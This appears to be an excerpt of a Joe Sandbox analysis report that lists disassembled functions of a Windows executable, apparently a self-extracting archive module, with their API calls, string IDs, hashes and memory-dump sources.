                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                        • String ID: csm
                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                        • Opcode ID: f4e40df8f58a4ffe0b18eaba274724494aec74f98e83cbb808a82037105cdc08
                                                                                                                        • Instruction ID: eacd508d81bf505f36b083f83cfa0e9136a94e6183c6143ba3efcb4fd21336f1
                                                                                                                        • Opcode Fuzzy Hash: f4e40df8f58a4ffe0b18eaba274724494aec74f98e83cbb808a82037105cdc08
                                                                                                                        • Instruction Fuzzy Hash: 8B41D434A00208AFCF14DF68C881ADF7BF1EF45328F149169E919BB392D7319A55CB90
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                        • API String ID: 176396367-3743748572
                                                                                                                        • Opcode ID: db80828532f30db4067dfc7e1c4c166f4ce6171eebe3af4d1a974f7d3b5d25f3
                                                                                                                        • Instruction ID: f74586cdfdcffb54f0d659ecfff617df0590b22ee4431377a82cd6411ef7033f
                                                                                                                        • Opcode Fuzzy Hash: db80828532f30db4067dfc7e1c4c166f4ce6171eebe3af4d1a974f7d3b5d25f3
                                                                                                                        • Instruction Fuzzy Hash: 5C319D3664430166DA30AB949C42BBB73E4EB86324F50942FF4867F2C2FB64BD4183A1
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00EAAAD2
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00EAAB01
                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00EAAB99
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectRelease
                                                                                                                        • String ID: -$7$
                                                                                                                        • API String ID: 1429681911-575736043
                                                                                                                        • Opcode ID: 93468c4847ee69656c31d4840ba446ab81da1f2b3a42d89b6f3ff00beadc57d2
                                                                                                                        • Instruction ID: a559ba8ba516c0a7a1af9ffec083d5c8948dd74239b2d841d521d078bf81cb36
                                                                                                                        • Opcode Fuzzy Hash: 93468c4847ee69656c31d4840ba446ab81da1f2b3a42d89b6f3ff00beadc57d2
                                                                                                                        • Instruction Fuzzy Hash: EE21EB72108304BFD3019FA6DC48E7FBFE9FB89351F04091AFA45A2120DB319A58DB62
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EBC868: _free.LIBCMT ref: 00EBC891
                                                                                                                        • _free.LIBCMT ref: 00EBC8F2
                                                                                                                          • Part of subcall function 00EB8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00EBC896,?,00000000,?,00000000,?,00EBC8BD,?,00000007,?,?,00EBCCBA,?), ref: 00EB8DE2
                                                                                                                          • Part of subcall function 00EB8DCC: GetLastError.KERNEL32(?,?,00EBC896,?,00000000,?,00000000,?,00EBC8BD,?,00000007,?,?,00EBCCBA,?,?), ref: 00EB8DF4
                                                                                                                        • _free.LIBCMT ref: 00EBC8FD
                                                                                                                        • _free.LIBCMT ref: 00EBC908
                                                                                                                        • _free.LIBCMT ref: 00EBC95C
                                                                                                                        • _free.LIBCMT ref: 00EBC967
                                                                                                                        • _free.LIBCMT ref: 00EBC972
                                                                                                                        • _free.LIBCMT ref: 00EBC97D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                        • Instruction ID: 536c8a3643a3a8bfc54c90905bffbe9ce1db00ab2087016face0eb1e857bb9c6
                                                                                                                        • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                        • Instruction Fuzzy Hash: 37112E71584B04AAE625BBB1EC07FCB7BECAF04B00F905C25F29DB6192DA75B505CB60
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00EAE669,00EAE5CC,00EAE86D), ref: 00EAE605
                                                                                                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00EAE61B
                                                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00EAE630
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                        • API String ID: 667068680-1718035505
                                                                                                                        • Opcode ID: 07cbd39b10b796a8960e6e38ca5e3ded95d62337d1e7f1211e702a53af1509c4
                                                                                                                        • Instruction ID: 94c4bff0b623233ce9b0f231e751fb30a3953db6ee500b57863a1b597eb9f882
                                                                                                                        • Opcode Fuzzy Hash: 07cbd39b10b796a8960e6e38ca5e3ded95d62337d1e7f1211e702a53af1509c4
                                                                                                                        • Instruction Fuzzy Hash: 5DF0C8327807229F0B214E765D85AB672C96BAF7493006C7DD901FB300EB11EC5A9790
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00EB891E
                                                                                                                          • Part of subcall function 00EB8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00EBC896,?,00000000,?,00000000,?,00EBC8BD,?,00000007,?,?,00EBCCBA,?), ref: 00EB8DE2
                                                                                                                          • Part of subcall function 00EB8DCC: GetLastError.KERNEL32(?,?,00EBC896,?,00000000,?,00000000,?,00EBC8BD,?,00000007,?,?,00EBCCBA,?,?), ref: 00EB8DF4
                                                                                                                        • _free.LIBCMT ref: 00EB8930
                                                                                                                        • _free.LIBCMT ref: 00EB8943
                                                                                                                        • _free.LIBCMT ref: 00EB8954
                                                                                                                        • _free.LIBCMT ref: 00EB8965
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID: p
                                                                                                                        • API String ID: 776569668-2678736219
                                                                                                                        • Opcode ID: dcf336e90ea47113d0560a27f6e24149b70bed9768e8df7279eed69905526cab
                                                                                                                        • Instruction ID: e30eb3a7e4cc4edf71f3671420a99d30c975171d514b98399250d615cb3e1eef
                                                                                                                        • Opcode Fuzzy Hash: dcf336e90ea47113d0560a27f6e24149b70bed9768e8df7279eed69905526cab
                                                                                                                        • Instruction Fuzzy Hash: 9DF0D0714101129F96456F56FE028E63BE9F7A4714381251FF618B63B1CB324A4ADF81
                                                                                                                        APIs
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EA14C2
                                                                                                                          • Part of subcall function 00E9B146: GetVersionExW.KERNEL32(?), ref: 00E9B16B
                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00EA14E6
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EA1500
                                                                                                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00EA1513
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EA1523
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EA1533
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2092733347-0
                                                                                                                        • Opcode ID: a991a380152e02df94c211e29b114f655d3f108acc356218b320b3d5008d503e
                                                                                                                        • Instruction ID: 43acac138dd70f778fe31168ceb29e52771155c4c1abd44ac83520fddace3e0d
                                                                                                                        • Opcode Fuzzy Hash: a991a380152e02df94c211e29b114f655d3f108acc356218b320b3d5008d503e
                                                                                                                        • Instruction Fuzzy Hash: A231F779108345AFC700DFA9C88499BB7E8BF98754F049A2EF995D3210E730E509CBA6
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,00EB2AF1,00EB02FC,00EAFA34), ref: 00EB2B08
                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EB2B16
                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EB2B2F
                                                                                                                        • SetLastError.KERNEL32(00000000,00EB2AF1,00EB02FC,00EAFA34), ref: 00EB2B81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3852720340-0
                                                                                                                        • Opcode ID: 9318e245031b7263e69c1683efb8fe7ddde7e135a87c57a89546627abda1dc6e
                                                                                                                        • Instruction ID: a8760b749a8abf8d0c34a0071b7cc687ad34f4d0ed9f7ea4092abdf96b85a592
                                                                                                                        • Opcode Fuzzy Hash: 9318e245031b7263e69c1683efb8fe7ddde7e135a87c57a89546627abda1dc6e
                                                                                                                        • Instruction Fuzzy Hash: 5001F7322083126EEA252BB67CCADE72B99EF01778760273FF220751F0EF125D069144
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,00ED1030,00EB4674,00ED1030,?,?,00EB3F73,00000050,?,00ED1030,00000200), ref: 00EB97E9
                                                                                                                        • _free.LIBCMT ref: 00EB981C
                                                                                                                        • _free.LIBCMT ref: 00EB9844
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00ED1030,00000200), ref: 00EB9851
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00ED1030,00000200), ref: 00EB985D
                                                                                                                        • _abort.LIBCMT ref: 00EB9863
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3160817290-0
                                                                                                                        • Opcode ID: e5d5fb62e2401150dffbd4ecf057875279af2e58a45fab6c0331f4a5fde5f8b8
                                                                                                                        • Instruction ID: 09c80bcad633ed9dd7b14ab874d71214dd3946e45ebcbf6495c698c6700351bf
                                                                                                                        • Opcode Fuzzy Hash: e5d5fb62e2401150dffbd4ecf057875279af2e58a45fab6c0331f4a5fde5f8b8
                                                                                                                        • Instruction Fuzzy Hash: 31F0CD361446016AC61933357D46FDB2AAD8FD2775F252135F724B22A3EF21C8068555
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00EADC47
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00EADC61
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EADC72
                                                                                                                        • TranslateMessage.USER32(?), ref: 00EADC7C
                                                                                                                        • DispatchMessageW.USER32(?), ref: 00EADC86
                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00EADC91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2148572870-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EAA699: GetDC.USER32(00000000), ref: 00EAA69D
                                                                                                                          • Part of subcall function 00EAA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EAA6A8
                                                                                                                          • Part of subcall function 00EAA699: ReleaseDC.USER32(00000000,00000000), ref: 00EAA6B3
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00EAA83C
                                                                                                                          • Part of subcall function 00EAAAC9: GetDC.USER32(00000000), ref: 00EAAAD2
                                                                                                                          • Part of subcall function 00EAAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00EAAB01
                                                                                                                          • Part of subcall function 00EAAAC9: ReleaseDC.USER32(00000000,?), ref: 00EAAB99
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectRelease$CapsDevice
                                                                                                                        • String ID: "$($A
                                                                                                                        • API String ID: 1061551593-2217482528
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EA05DA: _wcslen.LIBCMT ref: 00EA05E0
                                                                                                                          • Part of subcall function 00E9B92D: _wcsrchr.LIBVCRUNTIME ref: 00E9B944
                                                                                                                        • _wcslen.LIBCMT ref: 00E9C197
                                                                                                                        • _wcslen.LIBCMT ref: 00E9C1DF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$_wcsrchr
                                                                                                                        • String ID: .exe$.rar$.sfx
                                                                                                                        • API String ID: 3513545583-31770016
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 00E9BB27
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00E9A275,?,?,00000800,?,00E9A23A,?,00E9755C), ref: 00E9BBC5
                                                                                                                        • _wcslen.LIBCMT ref: 00E9BC3B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$CurrentDirectory
                                                                                                                        • String ID: UNC$\\?\
                                                                                                                        • API String ID: 3341907918-253988292
                                                                                                                        APIs
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00EACD84
                                                                                                                          • Part of subcall function 00EAAF98: _wcschr.LIBVCRUNTIME ref: 00EAB033
                                                                                                                          • Part of subcall function 00EA1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E9C116,00000000,.exe,?,?,00000800,?,?,?,00EA8E3C), ref: 00EA1FD1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$CompareString
                                                                                                                        • String ID: <$HIDE$MAX$MIN
                                                                                                                        • API String ID: 69343711-3358265660
                                                                                                                        APIs
                                                                                                                        • _swprintf.LIBCMT ref: 00E9B9B8
                                                                                                                          • Part of subcall function 00E94092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E940A5
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00E9B9D6
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00E9B9E6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                                        • String ID: %c:\
                                                                                                                        • API String ID: 525462905-3142399695
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E91316: GetDlgItem.USER32(00000000,00003021), ref: 00E9135A
                                                                                                                          • Part of subcall function 00E91316: SetWindowTextW.USER32(00000000,00EC35F4), ref: 00E91370
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00EAB2BE
                                                                                                                        • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00EAB2D6
                                                                                                                        • SetDlgItemTextW.USER32(?,00000067,?), ref: 00EAB304
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemText$DialogWindow
                                                                                                                        • String ID: GETPASSWORD1$xz
                                                                                                                        • API String ID: 445417207-3234807970
                                                                                                                        APIs
                                                                                                                        • LoadBitmapW.USER32(00000065), ref: 00EAB6ED
                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00EAB712
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00EAB744
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00EAB767
                                                                                                                          • Part of subcall function 00EAA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00EAB73D,00000066), ref: 00EAA6D5
                                                                                                                          • Part of subcall function 00EAA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00EAB73D,00000066), ref: 00EAA6EC
                                                                                                                          • Part of subcall function 00EAA6C2: LoadResource.KERNEL32(00000000,?,?,?,00EAB73D,00000066), ref: 00EAA703
                                                                                                                          • Part of subcall function 00EAA6C2: LockResource.KERNEL32(00000000,?,?,?,00EAB73D,00000066), ref: 00EAA712
                                                                                                                          • Part of subcall function 00EAA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00EAB73D,00000066), ref: 00EAA72D
                                                                                                                          • Part of subcall function 00EAA6C2: GlobalLock.KERNEL32(00000000), ref: 00EAA73E
                                                                                                                          • Part of subcall function 00EAA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00EAA762
                                                                                                                          • Part of subcall function 00EAA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00EAA7A7
                                                                                                                          • Part of subcall function 00EAA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00EAA7C6
                                                                                                                          • Part of subcall function 00EAA6C2: GlobalFree.KERNEL32(00000000), ref: 00EAA7CD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                        • String ID: ]
                                                                                                                        • API String ID: 1797374341-3352871620
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E91316: GetDlgItem.USER32(00000000,00003021), ref: 00E9135A
                                                                                                                          • Part of subcall function 00E91316: SetWindowTextW.USER32(00000000,00EC35F4), ref: 00E91370
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00EAD64B
                                                                                                                        • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00EAD661
                                                                                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 00EAD675
                                                                                                                        • SetDlgItemTextW.USER32(?,00000068), ref: 00EAD684
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemText$DialogWindow
                                                                                                                        • String ID: RENAMEDLG
                                                                                                                        • API String ID: 445417207-3299779563
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00EB7E24,00000000,?,00EB7DC4,00000000,00ECC300,0000000C,00EB7F1B,00000000,00000002), ref: 00EB7E93
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EB7EA6
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00EB7E24,00000000,?,00EB7DC4,00000000,00ECC300,0000000C,00EB7F1B,00000000,00000002), ref: 00EB7EC9
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EA081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EA0836
                                                                                                                          • Part of subcall function 00EA081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E9F2D8,Crypt32.dll,00000000,00E9F35C,?,?,00E9F33E,?,?,?), ref: 00EA0858
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E9F2E4
                                                                                                                        • GetProcAddress.KERNEL32(00ED81C8,CryptUnprotectMemory), ref: 00E9F2F4
                                                                                                                        Strings
